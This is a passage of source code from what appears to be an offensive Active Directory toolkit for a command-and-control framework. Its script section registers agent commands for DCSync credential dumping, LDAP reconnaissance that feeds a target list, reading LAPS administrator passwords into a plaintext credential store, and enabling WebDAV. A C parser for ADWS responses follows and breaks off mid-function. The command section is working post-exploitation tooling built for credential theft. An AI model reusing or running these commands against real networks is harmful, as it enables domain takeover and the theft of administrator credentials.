    ax.execute_alias_handler(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "DCSyncing all users...", dcsync_handler);
});

var cmd_dcsync = ax.create_command( "dcsync", "Perform DCSync operations (DCSync-BOF)", "dcsync {subcommand} [options]" );
cmd_dcsync.addSubCommands([_cmd_dcsync_single]);
cmd_dcsync.addSubCommands([_cmd_dcsync_all]);





var cmd_ldapsearch = ax.create_command("ldapsearch", "Executes LDAP query", "ldapsearch (objectClass=*) -a *,ntsecuritydescriptor -c 40 -s 2 --dc DC1");
cmd_ldapsearch.addArgString("query", true);
cmd_ldapsearch.addArgFlagString( "-a", "attributes", "The attributes to retrieve", "*");
cmd_ldapsearch.addArgFlagInt( "-c", "count", "The result max size", 0);
cmd_ldapsearch.addArgFlagInt( "-s", "scope", "The scope to use: 1 = BASE, 2 = LEVEL, 3 = SUBTREE", 3);
cmd_ldapsearch.addArgFlagString( "--dc", "dc", "Hostname or IP to perform the LDAP connection on", "");
cmd_ldapsearch.addArgFlagString( "--dn", "dn", "The LDAP query basee", "");
cmd_ldapsearch.addArgBool( "--ldaps", "Using of LDAPS");
cmd_ldapsearch.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let query      = parsed_json["query"];
    let attributes = parsed_json["attributes"];
    let count      = parsed_json["count"];
    let scope      = parsed_json["scope"];
    let dc         = parsed_json["dc"];
    let dn         = parsed_json["dn"];
    let ldaps = 0;

    if (parsed_json["--ldaps"]) { ldaps = 1; }

    let bof_params = ax.bof_pack("wstr,cstr,int,int,cstr,cstr,int", [query, attributes, count, scope, dc, dn, ldaps]);
    let bof_path = ax.script_dir() + "_bin/ldapsearch." + ax.arch(id) + ".o";
    let message = "BOF implementation: ldapsearch";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



var _cmd_ldapq_computers = ax.create_command("computers", "Get list of computers from ldap", "ldapq computers");
_cmd_ldapq_computers.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let hook = function (task)
    {
        var blocks = task.text.split("--------------------");
        var arr = [];

        for (var i = 0; i < blocks.length; i++) {
            var block = blocks[i].trim();
            if (block.length === 0 || block.indexOf("cn:") === -1) continue;

            var lines = block.split("\n");
            var obj = {};
            for (var j = 0; j < lines.length; j++) {
                var line = lines[j].trim();
                if (line.length === 0) continue;
                var parts = line.split(":");
                var key = parts[0].trim();
                var value = parts.slice(1).join(":").trim();
                if (key === "cn") obj.computer = value;
                else if (key === "dNSHostName") obj.domain = value.split(".").slice(1).join(".");
                else if (key === "operatingSystem") {
                    obj.os_desc = value;
                    if (value.toLowerCase().indexOf("windows") !== -1)    obj.os = "windows";
                    else if (value.toLowerCase().indexOf("linux") !== -1) obj.os = "linux";
                    else if (value.toLowerCase().indexOf("mac") !== -1)   obj.os = "macos";
                    else obj.os = "unknown";
                }
                else if (key === "userAccountControl") {
                    var uac = parseInt(value, 10);
                    if ((uac & 2) === 0) continue;
                }
            }
            obj.alive = true;
            obj.tag = "";
            obj.info = "collected from ldap";

            arr.push(obj);
        }
        if(arr.length > 0)  ax.targets_add_list(arr);

        return task;
    }

    let bof_params = ax.bof_pack("wstr,cstr,int,int,cstr,cstr,int", ["(objectclass=computer)", "cn,operatingSystem,userAccountControl,dNSHostName", 0, 3, "", "", 0]);
    let bof_path = ax.script_dir() + "_bin/ldapsearch." + ax.arch(id) + ".o";
    let message = "BOF ldapsearch: query computers";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message, hook);
});

var cmd_ldapq = ax.create_command("ldapq", "Ldap query objects", "ldapq computers");
cmd_ldapq.addSubCommands([_cmd_ldapq_computers]);




let readlaps_handler = function (task) {
    const lines = task.text.split(/\r?\n/);
    let target = "";

    const reTarget = /^\[\*\]\s+Target:\s+(.+)$/;
    const reLegacyPass = /^\[\+\]\s+Legacy\s+LAPS\s+Password:\s+(.+)$/;
    const reV2Pass = /^\[\+\]\s+Decrypted\s+Output:\s+(.+)$/;

    for (const line of lines) {
        const trimmed = line.trim();
        if (!trimmed) continue;

        let m = reTarget.exec(trimmed);
        if (m) {
            target = m[1];
            continue;
        }

        let password = null;
        let type = "laps";

        m = reLegacyPass.exec(trimmed);
        if (m) {
            password = m[1];
            type = "laps-legacy";
        } else {
            m = reV2Pass.exec(trimmed);
            if (m) {
                password = m[1];
                type = "laps-v2";
            }
        }

        if (password && target) {
            ax.credentials_add_list([{
                username: "Administrator",
                type: "plaintext",
                password: password,
                storage: type,
                realm: target,
                host: target,
                tag: "laps"
            }]);
        }
    }
};




var cmd_readlaps = ax.create_command("readlaps", "Read LAPS password for a computer", "readlaps -dc dc01.domain.local -target WINCLIENT");
cmd_readlaps.addArgFlagString("-dc", "dc", "Target domain controller (e.g., 'dc01.domain.local'). Hostname preferred over IP for LDAP.", "");
cmd_readlaps.addArgFlagString("-dn", "dn", "Root DN (e.g., 'DC=domain,DC=local'). If not specified, derived from agent domain.", "");
cmd_readlaps.addArgFlagString("-target", "target", "Target computer sAMAccountName (e.g., 'WINCLIENT$')", "");
cmd_readlaps.addArgFlagString("-target-dn", "target_dn", "Target computer Distinguished Name (e.g., 'CN=WINCLIENT,OU=Computers,DC=domain,DC=local')", "");
cmd_readlaps.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let dc        = parsed_json["dc"];
    let dn        = parsed_json["dn"];
    let target    = parsed_json["target"];
    let target_dn = parsed_json["target_dn"];

    if (!target && !target_dn) {
        throw new Error("Either -target (sAMAccountName) or -target-dn (Distinguished Name) must be specified");
    }

    if (target && target_dn) {
        throw new Error("Cannot specify both -target and -target-dn");
    }

    // If -dn not specified, derive from agent domain
    if (!dn || dn === "") {
        let domain = ax.agent_info(id, "domain")
        if (domain) {
            let parts = domain.split(".");
            dn = parts.map(part => "DC=" + part).join(",");
        } else {
            throw new Error("Could not auto-detect DN. Agent domain not available. Please specify -dn manually.");
        }
    }

    // Strip quotes from target values if present
    if (dc) {
        dc = dc.replace(/^['"]|['"]$/g, '');
    }
    if (target) {
        target = target.replace(/^['"]|['"]$/g, '');
    }
    if (target_dn) {
        target_dn = target_dn.replace(/^['"]|['"]$/g, '');
    }

    // Build the LDAP search filter
    let searchFilter = "";
    let message = "";
    if (target) {
        // Ensure target ends with $ for computer accounts if not already present
        let computerName = target;
        if (!computerName.endsWith("$")) {
            computerName = computerName + "$";
        }
        searchFilter = "(&(objectClass=computer)(sAMAccountName=" + computerName + "))";
        message = `Read LAPS password for ${computerName}`;
    } else {
        searchFilter = "(&(objectClass=computer)(distinguishedName=" + target_dn + "))";
        message = `Read LAPS password for ${target_dn}`;
    }

    let reportTarget = target ? target : target_dn;
    let bof_params = ax.bof_pack("cstr,cstr,cstr,cstr", [dc, dn, searchFilter, reportTarget]);
    let bof_path = ax.script_dir() + "_bin/readlaps." + ax.arch(id) + ".o";

    ax.execute_alias_handler(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message, readlaps_handler);
});





var _cmd_webdav_enable = ax.create_command("enable", "Enable the WebDAV client service without elevated permissions", "webdav enable");
_cmd_webdav_enable.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let bof_path = ax.script_dir() + "_bin/webdav_enable." + ax.arch(id) + ".o";
    let message = "Enable the WebDAV client service";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, message);
});

var _cmd_webdav_status = ax.create_command("status", "Determine if the WebDAV is running on a remote system", "webdav status 192.168.0.1,192.168.0.2");
_cmd_webdav_status.addArgString("hosts", "", "127.0.0.1");
_cmd_webdav_status.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let hosts = parsed_json["hosts"];

    let bof_params = ax.bof_pack("cstr", [hosts]);
    let bof_path = ax.script_dir() + "_bin/webdav_status." + ax.arch(id) + ".o";
    let message = "Task: Check WebDAV status";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});

var cmd_webdav = ax.create_command("webdav", "Manage webdav service", "webdav enable");
cmd_webdav.addSubCommands([_cmd_webdav_enable]);
cmd_webdav.addSubCommands([_cmd_webdav_status]);



var group_exec = ax.create_commands_group("AD-BOF", [cmd_adwssearch, cmd_badtakeover, cmd_dcsync, cmd_ldapsearch, cmd_ldapq, cmd_readlaps, cmd_webdav]);
ax.register_commands_group(group_exec, ["beacon", "gopher", "kharon"], ["windows"], []);

================================================
FILE: AD-BOF/adwssearch/adws_parser.h
================================================
/*
 * adws_parser.h - ADWS Response Parser
 *
 * Functions for parsing ADWS/NBFSE responses including:
 * - Enumerate/Pull response parsing
 * - Attribute extraction (text, numeric, binary, multi-value)
 * - Object boundary detection
 * - GUID and SID conversion
 * - Base64 encoding for binary data
 */

#ifndef ADWS_PARSER_H
#define ADWS_PARSER_H

#ifdef BOF
#include "beacon.h"
#include "bofdefs.h"
#else
#include <windows.h>
#endif

#ifdef BOF
typedef struct OUTPUT_BUFFER
{
    formatp buffer;
    BOOL initialized;
} OutputBuffer;
#else
typedef struct OUTPUT_BUFFER
{
    char *data;
    DWORD size;
    DWORD capacity;
} OutputBuffer;
#endif

void OutputInit(OutputBuffer *buf);
void OutputPrintf(OutputBuffer *buf, const char *format, ...);
void OutputFlush(OutputBuffer *buf, DWORD objIdx);
void internal_printf(const char *format, ...);
void printoutput(BOOL done);

typedef struct
{
    char name[64];
    char value[4096];
} ATTRIBUTE_ENTRY;

typedef struct
{
    DWORD start;
    DWORD end;
} OBJECT_BOUNDARY;

BOOL ParseEnumerateResponse(BYTE *response, DWORD responseLen, char *enumContext, DWORD contextSize);
BOOL ParsePullResponse(BYTE *response, DWORD responseLen, const char *attrFilter, BOOL *hasMore,
                       DWORD *objectsInThisPull);

char *ConvertBinaryToBase64(BYTE *data, DWORD len);
BOOL IsMetadata(const char *str);
BOOL ExtractAttributeUniversal(BYTE *data, DWORD len, const char *attributeName, char *outValue, DWORD outSize);
DWORD DiscoverAttributeNames(BYTE *data, DWORD start, DWORD end, char attributeNames[][64], DWORD maxAttrs);
DWORD DiscoverAttributesInObject(BYTE *data, DWORD start, DWORD end, ATTRIBUTE_ENTRY *attrs, DWORD maxAttrs);
DWORD FindObjectBoundaries(BYTE *data, DWORD dataLen, OBJECT_BOUNDARY *boundaries, DWORD maxBoundaries);

BOOL ParseEnumerateResponse(BYTE *response, DWORD responseLen, char *enumContext, DWORD contextSize)
{
    const char *contextTag = "EnumerationContext";
    DWORD i;

    // Look for EnumerationContext tag
    for (i = 0; i < responseLen - MSVCRT$strlen(contextTag); i++)
    {
        if (MSVCRT$memcmp(response + i, contextTag, MSVCRT$strlen(contextTag)) == 0)
        {
            i += MSVCRT$strlen(contextTag);

            while (i < responseLen && response[i] != 0x98 && response[i] != 0x99)
            {
                i++;
            }

            if (i < responseLen && (response[i] == 0x98 || response[i] == 0x99))
            {
                i++;
                BYTE textLen = response[i++];

                if (i + textLen <= responseLen)
                {
                    DWORD copyLen = (textLen < contextSize - 1) ? textLen : contextSize - 1;
                    MSVCRT$memcpy(enumContext, response + i, copyLen);
                    enumContext[copyLen] = '\0';
                    return TRUE;
                }
            }
        }
    }

    return FALSE;
}

BOOL IsMetadata(const char *str)
{
    const char *metadata[] = {
        "xsd:string", "xsd:int", "xsd:long", "xsd:boolean", "xsd:dateTime", "xsd:base64Binary", "LdapSyntax",
        "UnicodeString", "DNString", "DSDNString", "SidString", "OctetString", "LargeInteger", "Integer", "Boolean",
        "GeneralizedTime", "DirectoryString", "DNWithBinary", "DNWithString", "ObjectIdentifier",
        "GeneralizedTimeString", "PrintableString", "UTF8String", "IA5String", "TimeString", "Identifier", "Syntax",
        "String",
        // XML namespace and SOAP metadata
        "objectReferenceProperty", "value", "xsi", "type", "ad", "addata", "wsen", "Items", "domainDNS", "xsd", NULL};

    // Check against known metadata
    for (int i = 0; metadata[i] != NULL; i++)
    {
        if (MSVCRT$strcmp(str, metadata[i]) == 0)
        {
            return TRUE;
        }
    }

    if (MSVCRT$strlen(str) == 36)
    {
        int dashCount = 0;
        for (int i = 0; i < 36; i++)
        {
            if (str[i] == '-')
                dashCount++;
        }
        if (dashCount == 4)
            return TRUE;
    }

    if (MSVCRT$strlen(str) == 1 && str[0] >= '0' && str[0] <= '9')
    {
        return TRUE;
    }

    return FALSE;
}

char *ConvertBinaryToBase64(BYTE *data, DWORD len)
{
    const char *b64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    DWORD outLen = ((len + 2) / 3) * 4 + 1;
    char *result = (char *)intAlloc(outLen);
    if (!result)
        return NULL;

    DWORD i, j;
    for (i = 0, j = 0; i < len; i += 3, j += 4)
    {
        DWORD n = (data[i] << 16) | ((i + 1 < len) ? (data[i + 1] << 8) : 0) | ((i + 2 < len) ? data[i + 2] : 0);
        result[j] = b64chars[(n >> 18) & 0x3F];
        result[j + 1] = b64chars[(n >> 12) & 0x3F];
        result[j + 2] = (i + 1 < len) ? b64chars[(n >> 6) & 0x3F] : '=';
        result[j + 3] = (i + 2 < len) ? b64chars[n & 0x3F] : '=';
    }
    result[j] = '\0';
    return result;
}

BOOL ExtractAttributeUniversal(BYTE *data, DWORD len, const char *attributeName, char *outValue, DWORD outSize)
{
    if (!data || !attributeName || !outValue || len == 0 || outSize == 0)
    {
        return FALSE;
    }

    outValue[0] = '\0';

    DWORD attrLen = MSVCRT$strlen(attributeName);

    // Check if this is a multi-value attribute
    BOOL isMultiValue =
        (MSVCRT$_stricmp(attributeName, "objectClass") == 0 ||
         MSVCRT$_stricmp(attributeName, "memberOf") == 0 ||
         MSVCRT$_stricmp(attributeName, "member") == 0 ||
         MSVCRT$_stricmp(attributeName, "dSCorePropagationData") == 0 ||
         MSVCRT$_stricmp(attributeName, "wellKnownObjects") == 0 ||
         MSVCRT$_stricmp(attributeName, "otherWellKnownObjects") == 0 ||
         MSVCRT$_stricmp(attributeName, "subRefs") == 0 ||
         MSVCRT$_stricmp(attributeName, "repsTo") == 0 ||
         MSVCRT$_stricmp(attributeName, "repsFrom") == 0 ||
         MSVCRT$_stricmp(attributeName, "masteredBy") == 0 ||
         MSVCRT$_stricmp(attributeName, "msDs-masteredBy") == 0 ||
         MSVCRT$_stricmp(attributeName, "servicePrincipalName") == 0 ||
         MSVCRT$_stricmp(attributeName, "msDS-IsDomainFor") == 0 ||
         MSVCRT$_stricmp(attributeName, "msDS-IsPartialReplicaFor") == 0);

    // Search for the attribute name
    for (DWORD i = 0; i < len - attrLen; i++)
    {
        BOOL match = FALSE;
        BOOL isAddataPattern = FALSE;

        // Pattern 1: Direct match (filtered responses) - attribute preceded by its length
        if (i > 0 && data[i - 1] == (BYTE)attrLen && i + attrLen + 2 < len)
        {
            BOOL looksLikeAttribute = FALSE;
            BYTE followingByte = data[i + attrLen];
            if (followingByte == 0x04 ||                            // Followed by a length byte
                followingByte == 0x41 ||                            // Followed by ELEMENT
                followingByte == 0x05 ||                            // Followed by another record
                (followingByte >= 0x80 && followingByte <= 0x86) || // Numeric value records
                (followingByte == 0x98 && data[i + attrLen + 1] == 0x0A))
            { // Text record "xsd:string"
                looksLikeAttribute = TRUE;
            }

            if (looksLikeAttribute)
            {
                match = TRUE;
                for (DWORD j = 0; j < attrLen; j++)
                {
                    if ((data[i + j] | 0x20) != (attributeName[j] | 0x20))
                    {
                        match = FALSE;
                        break;
                    }
                }
            }
        }

        // Pattern 2: addata.attributeName (unfiltered responses)
        if (!match && i >= 8 && attrLen > 0)
        {
            if (data[i - 8] == 0x41 && data[i - 7] == 0x06 && MSVCRT$memcmp(data + i - 6, "addata", 6) == 0 &&
                data[i - 1] == (BYTE)attrLen)
            {

                match = TRUE;
                for (DWORD j = 0; j < attrLen; j++)
                {
                    if ((data[i + j] | 0x20) != (attributeName[j] | 0x20))
                    {
                        match = FALSE;
                        break;
                    }
                }
                if (match)
                    isAddataPattern = TRUE;
            }
        }

        if (match)
        {
            // Skip past attribute name
            DWORD j = i + attrLen;

            // Skip metadata patterns
            const char *skipPatterns[] = {"xsd:string",
                                          "xsd:int",
                                          "xsd:long",
                                          "xsd:boolean",
                                          "xsd:dateTime",
                                          "xsd:base64Binary",
                                          "LdapSyntax",
                                          "UnicodeString",
                                          "DNString",
                                          "DSDNString",
                                          "SidString",
                                          "OctetString",
                                          "LargeInteger",
                                          "Integer",
                                          "Boolean",
                                          "GeneralizedTime",
                                          "DirectoryString",
                                          "DNWithBinary",
                                          "DNWithString",
                                          "ObjectIdentifier",
                                          "GeneralizedTimeString",
                                          "PrintableString",
                                          "UTF8String",
                                          "IA5String",
                                          "TimeString",
                                          "Identifier",
                                          "Syntax",
                                          "String",
                                          NULL};

            // Search for value - increase limits especially for multi-value
            DWORD maxSearch = isMultiValue ? 5000 : (isAddataPattern ? 500 : 300);
            DWORD searchLimit = (maxSearch < len - i - attrLen) ? maxSearch : (len - i - attrLen);

            while (j < len && j < i + attrLen + searchLimit)
            {

                while (j < len && data[j] == 0x00)
                    j++;

                if (j >= len)
                    break;

                BOOL isMetadata = FALSE;

                for (int p = 0; skipPatterns[p] != NULL; p++)
                {
                    DWORD patLen = MSVCRT$strlen(skipPatterns[p]);
                    if (j + patLen <= len)
                    {
                        if ((data[j] == 0x98 || data[j] == 0x99) && j + 1 < len)
                        {
                            BYTE tlen = data[j + 1];
                            if (tlen == patLen && j + 2 + tlen <= len &&
                                MSVCRT$memcmp(data + j + 2, skipPatterns[p], patLen) == 0)
                            {
                                j += 2 + tlen;
                                isMetadata = TRUE;
                                break;
                            }
                        }
                    }
                }

                if (isMetadata)
                {
                    continue;
                }

                // Look for actual value records
                BYTE recordType = data[j];

                if (recordType >= 0x80 && recordType <= 0x8F)
                {
                    if (isMultiValue)
                    {
                        j++;
                        continue;
                    }

                    if (recordType < 0x80 || recordType > 0x8F)
                    {
                        j++;
                        continue;
                    }

                    if (recordType == 0x80 || recordType == 0x81)
                    {
                        outValue[0] = '0';
                        outValue[1] = '\0';
                        return TRUE;
                    }
                    if (recordType == 0x82)
                    {
                        outValue[0] = '1';
                        outValue[1] = '\0';
                        return TRUE;
                    }

                    switch (recordType)
                    {
                    case 0x80:
                    case 0x81:
                        outValue[0] = '0';
                        outValue[1] = '\0';
                        return TRUE;
                    case 0x82:
                        outValue[0] = '1';
                        outValue[1] = '\0';
                        return TRUE;
                    case 0x83:
                        if (j + 1 < len)
                        {
                            MSVCRT$sprintf(outValue, "%d", (int)(signed char)data[j + 1]);
                            return TRUE;
                        }
                        break;
                    case 0x84:
                        if (j + 2 < len)
                        {
                            short val = data[j + 1] | (data[j + 2] << 8);
                            MSVCRT$sprintf(outValue, "%d", val);
                            return TRUE;
                        }
                        break;
                    case 0x85:
                        if (j + 4 < len)
                        {
                            int val = data[j + 1] | (data[j + 2] << 8) | (data[j + 3] << 16) | (data[j + 4] << 24);
                            MSVCRT$sprintf(outValue, "%d", val);
                            return TRUE;
                        }
                        break;
                    case 0x86:
                        if (j + 8 < len)
                        {
                            long long val = 0;
                            for (int k = 0; k < 8; k++)
                            {
                                val |= ((long long)data[j + 1 + k]) << (k * 8);
                            }
                            MSVCRT$sprintf(outValue, "%I64d", val);
                            return TRUE;
                        }
                        break;
                    default:
                        // For 0x87-0x8F, need length decoding
                        j++;
                        continue;
                    }
                }
                else if ((recordType == 0x98 || recordType == 0x99) && j + 1 < len)
                {
                    BYTE textLen = data[j + 1];
                    if (textLen > 0 && textLen < 250 && j + 2 + textLen <= len)
                    {
                        BOOL isValueMetadata = FALSE;
                        for (int p = 0; skipPatterns[p] != NULL; p++)
                        {
                            if (textLen == MSVCRT$strlen(skipPatterns[p]) &&
                                MSVCRT$memcmp(data + j + 2, skipPatterns[p], textLen) == 0)
                            {
                                isValueMetadata = TRUE;
                                break;
                            }
                        }

                        if (!isValueMetadata && textLen > 0)
                        {
                            if (MSVCRT$_stricmp(attributeName, "nTSecurityDescriptor") == 0)
                            {
                                // Skip text values for nTSecurityDescriptor
                                j += 2 + textLen;
                                continue;
                            }

                            if (isMultiValue && textLen == 1 && data[j + 2] >= '0' && data[j + 2] <= '9')
                            {
                                j += 2 + textLen;
                                continue;
                            }

                            if (isMultiValue)
                            {
                                BOOL isValidValue = TRUE;
                                char tempValue[256];
                                DWORD copyLen = (textLen < 255) ? textLen : 255;
                                MSVCRT$memcpy(tempValue, data + j + 2, copyLen);
                                tempValue[copyLen] = '\0';

                                if (MSVCRT$_stricmp(attributeName, "objectClass") == 0)
                                {
                                    BOOL hasAlpha = FALSE;
                                    for (DWORD k = 0; k < copyLen; k++)
                                    {
                                        if ((tempValue[k] >= 'a' && tempValue[k] <= 'z') ||
                                            (tempValue[k] >= 'A' && tempValue[k] <= 'Z'))
                                        {
                                            hasAlpha = TRUE;
                                        }
                                        else if (tempValue[k] != '-' && tempValue[k] != '_' &&
                                                 !(tempValue[k] >= '0' && tempValue[k] <= '9'))
                                        {
                                            isValidValue = FALSE;
                                            break;
                                        }
                                    }
                                    if (!hasAlpha)
                                        isValidValue = FALSE;
                                }
                                else if (MSVCRT$_stricmp(attributeName, "memberOf") == 0)
                                {
                                    if (!MSVCRT$strstr(tempValue, "CN=") && !MSVCRT$strstr(tempValue, "cn="))
                                    {
                                        isValidValue = FALSE;
                                    }
                                }
                                else if (MSVCRT$_stricmp(attributeName, "dSCorePropagationData") == 0)
                                {
                                    if (copyLen < 16 || tempValue[copyLen - 1] != 'Z' ||
                                        (copyLen > 2 && tempValue[copyLen - 3] != '.'))
                                    {
                                        isValidValue = FALSE;
                                    }
                                }
                                else if (MSVCRT$_stricmp(attributeName, "wellKnownObjects") == 0 ||
                                         MSVCRT$_stricmp(attributeName, "otherWellKnownObjects") == 0)
                                {
                                    if (copyLen < 5 || tempValue[0] != 'B' || tempValue[1] != ':')
                                    {
                                        isValidValue = FALSE;
                                    }
                                }

                                if (isValidValue)
                                {
                                    if (MSVCRT$strlen(outValue) > 0)
                                    {
                                        MSVCRT$strcat(outValue, ", ");
                                    }
                                    DWORD currentLen = MSVCRT$strlen(outValue);
                                    DWORD remainingSpace = outSize - currentLen - 1;
                                    if (copyLen > remainingSpace)
                                        copyLen = remainingSpace;
                                    MSVCRT$strncat(outValue, tempValue, copyLen);
                                }
                                j += 2 + textLen;
                                continue;
                            }
                            else
                            {
                                DWORD copyLen = (textLen < outSize - 1) ? textLen : outSize - 1;
                                MSVCRT$memcpy(outValue, data + j + 2, copyLen);
                                outValue[copyLen] = '\0';
                                return TRUE;
                            }
                        }
                    }
                }
                else if ((recordType == 0x9E || recordType == 0x9F) && j + 1 < len)
                {
                    BYTE binLen = data[j + 1];
                    if (binLen > 0 && j + 2 + binLen <= len)
                    {
                        if (MSVCRT$_stricmp(attributeName, "objectGUID") == 0)
                        {
                            BYTE guidBytes[16];
                            MSVCRT$memcpy(guidBytes, data + j + 2, binLen);

                            if (binLen == 15)
                            {
                                DWORD nextPos = j + 2 + binLen;
                                if (nextPos + 2 < len && data[nextPos] == 0x9F && data[nextPos + 1] == 0x01)
                                {
                                    guidBytes[15] = data[nextPos + 2];
                                }
                                else
                                {
                                    guidBytes[15] = 0;
                                }
                            }

                            MSVCRT$sprintf(
                                outValue, "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x",
                                guidBytes[3], guidBytes[2], guidBytes[1], guidBytes[0], guidBytes[5], guidBytes[4],
                                guidBytes[7], guidBytes[6], guidBytes[8], guidBytes[9], guidBytes[10], guidBytes[11],
                                guidBytes[12], guidBytes[13], guidBytes[14], guidBytes[15]);
                            return TRUE;
                        }
                        else if (MSVCRT$_stricmp(attributeName, "objectSid") == 0 ||
                                 MSVCRT$_stricmp(attributeName, "objectsid") == 0)
                        {
                            BYTE sidBytes[68];
                            DWORD totalSidLen = binLen;
                            MSVCRT$memcpy(sidBytes, data + j + 2, binLen);

                            DWORD nextPos = j + 2 + binLen;
                            if (nextPos < len && data[nextPos] == 0x9F)
                            {
                                BYTE contLen = data[nextPos + 1];
                                if (nextPos + 2 + contLen <= len)
                                {
                                    MSVCRT$memcpy(sidBytes + binLen, data + nextPos + 2, contLen);
                                    totalSidLen = binLen + contLen;
                                }
                            }

                            if (totalSidLen > 8)
                            {
                                BYTE revision = sidBytes[0];
                                BYTE subAuthCount = sidBytes[1];
                                ULONGLONG authority = 0;
                                for (int k = 0; k < 6; k++)
                                {
                                    authority = (authority << 8) | sidBytes[2 + k];
                                }
                                char *p = outValue;
                                p += MSVCRT$sprintf(p, "S-%u-%llu", revision, authority);
                                for (BYTE k = 0; k < subAuthCount && (8 + k * 4 + 3) <= totalSidLen; k++)
                                {
                                    DWORD subAuth = sidBytes[8 + k * 4] | (sidBytes[8 + k * 4 + 1] << 8) |
                                                    (sidBytes[8 + k * 4 + 2] << 16) | (sidBytes[8 + k * 4 + 3] << 24);
                                    p += MSVCRT$sprintf(p, "-%lu", subAuth);
                                }
                                return TRUE;
                            }
                        }
                        else if (MSVCRT$_stricmp(attributeName, "securityIdentifier") == 0)
                        {
                            BYTE sidBytes[68];
                            DWORD totalSidLen = binLen;
                            MSVCRT$memcpy(sidBytes, data + j + 2, binLen);

                            DWORD nextPos = j + 2 + binLen;
                            if (nextPos < len && data[nextPos] == 0x9F)
                            {
                                BYTE contLen = data[nextPos + 1];
                                if (nextPos + 2 + contLen <= len)
                                {
                                    MSVCRT$memcpy(sidBytes + binLen, data + nextPos + 2, contLen);
                                    totalSidLen = binLen + contLen;
                                }
                            }

                            if (totalSidLen > 8)
                            {
                                BYTE revision = sidBytes[0];
                                BYTE subAuthCount = sidBytes[1];
                                ULONGLONG authority = 0;
                                for (int k = 0; k < 6; k++)
                                {
                                    authority = (authority << 8) | sidBytes[2 + k];
                                }
                                char *p = outValue;
                                p += MSVCRT$sprintf(p, "S-%u-%llu", revision, authority);
                                for (BYTE k = 0; k < subAuthCount && (8 + k * 4 + 3) <= totalSidLen; k++)
                                {
                                    DWORD subAuth = sidBytes[8 + k * 4] | (sidBytes[8 + k * 4 + 1] << 8) |
                                                    (sidBytes[8 + k * 4 + 2] << 16) | (sidBytes[8 + k * 4 + 3] << 24);
                                    p += MSVCRT$sprintf(p, "-%lu", subAuth);
                                }
                                return TRUE;
                            }
                        }
                        else
                        {
                            char *b64 = ConvertBinaryToBase64(data + j + 2, binLen);
                            if (b64)
                            {
                                MSVCRT$strncpy(outValue, b64, outSize - 1);
                                outValue[outSize - 1] = '\0';
                                intFree(b64);
                            }
                        }
                        return TRUE;
                    }
                }
                else if ((recordType == 0xA0 || recordType == 0xA1) && j + 2 < len)
                {
                    DWORD binLen = data[j + 1] | (data[j + 2] << 8);
                    if (binLen > 0 && j + 3 + binLen <= len)
                    {
                        BYTE *binData = data + j + 3;
                        DWORD totalLen = binLen;

                        DWORD nextOffset = j + 3 + binLen;
                        if (nextOffset < len && data[nextOffset] == 0x9F && nextOffset + 1 < len)
                        {
                            BYTE contLen = data[nextOffset + 1];
                            if (nextOffset + 2 + contLen <= len && contLen > 0)
                            {
                                BYTE *combined = (BYTE *)intAlloc(binLen + contLen);
                                if (combined)
                                {
                                    MSVCRT$memcpy(combined, binData, binLen);
                                    MSVCRT$memcpy(combined + binLen, data + nextOffset + 2, contLen);
                                    binData = combined;
                                    totalLen = binLen + contLen;
                                }
                            }
                        }

                        char *b64 = ConvertBinaryToBase64(binData, totalLen);
                        if (b64)
                        {
                            MSVCRT$strncpy(outValue, b64, outSize - 1);
                            outValue[outSize - 1] = '\0';
                            intFree(b64);
                        }

                        if (binData != data + j + 3)
                        {
                            intFree((void *)binData);
                        }

                        return TRUE;
                    }
                }
                else if (recordType == 0x01)
                {
                    break;
                }

                j++;
            }

            // For multi-value attributes, return whats collected if found any values
            if (isMultiValue && MSVCRT$strlen(outValue) > 0)
            {
                return TRUE;
            }

            return FALSE;
        }
    }

    return FALSE;
}

DWORD DiscoverAttributeNames(BYTE *data, DWORD start, DWORD end, char attributeNames[][64], DWORD maxAttrs)
{
    DWORD attrCount = 0;

    const char *skipMetadata[] = {
        "wsen", "Items", "domainDNS", "objectReferenceProperty", "value", "xsi", "type", "LdapSyntax", "DSDNString",
        "Integer", "LargeInteger", "GeneralizedTimeString", "UnicodeString", "Boolean", "ObjectIdentifier", "top",
        "leaf", "domain", "DNBinary", "ReplicaLink", "OctetString", "SidString", "addata", "Syntax", "String",
        "DirectoryString", "DNString", "DNWithBinary", "DNWithString", "PrintableString", "UTF8String", "IA5String",
        "TimeString", "Identifier",
        // Object type markers - these are XML element names, not attributes
        "user", "group", "computer", "organizationalUnit", "container",
        // Common objectClass values that might be picked up as attributes
        "person", "organizationalPerson", "inetOrgPerson", "contact", "msDS-GroupManagedServiceAccount",
        "msDS-ManagedServiceAccount", "trustedDomain", "foreignSecurityPrincipal", "device",
        // Other metadata that might appear
        "container-hierarchy-parent", "relativeDistinguishedName", "ad", "xsd", "instance", NULL};

    // Scan for addata.attributeName patterns
    for (DWORD i = start; i < end - 10 && attrCount < maxAttrs; i++)
    {
        if (data[i] == 0x41 && data[i + 1] == 0x06 && i + 8 < end && MSVCRT$memcmp(data + i + 2, "addata", 6) == 0)
        {

            BYTE attrLen = data[i + 8];
            if (attrLen > 0 && attrLen < 64 && i + 9 + attrLen <= end)
            {
                // Extract attribute name
                char attrName[64];
                MSVCRT$memcpy(attrName, data + i + 9, attrLen);
                attrName[attrLen] = '\0';

                // Check if it's a valid attribute name (not metadata)
                BOOL isValid = TRUE;
                BOOL hasAlpha = FALSE;
                for (BYTE j = 0; j < attrLen; j++)
                {
                    if ((attrName[j] >= 'a' && attrName[j] <= 'z') || (attrName[j] >= 'A' && attrName[j] <= 'Z'))
                    {
                        hasAlpha = TRUE;
                    }
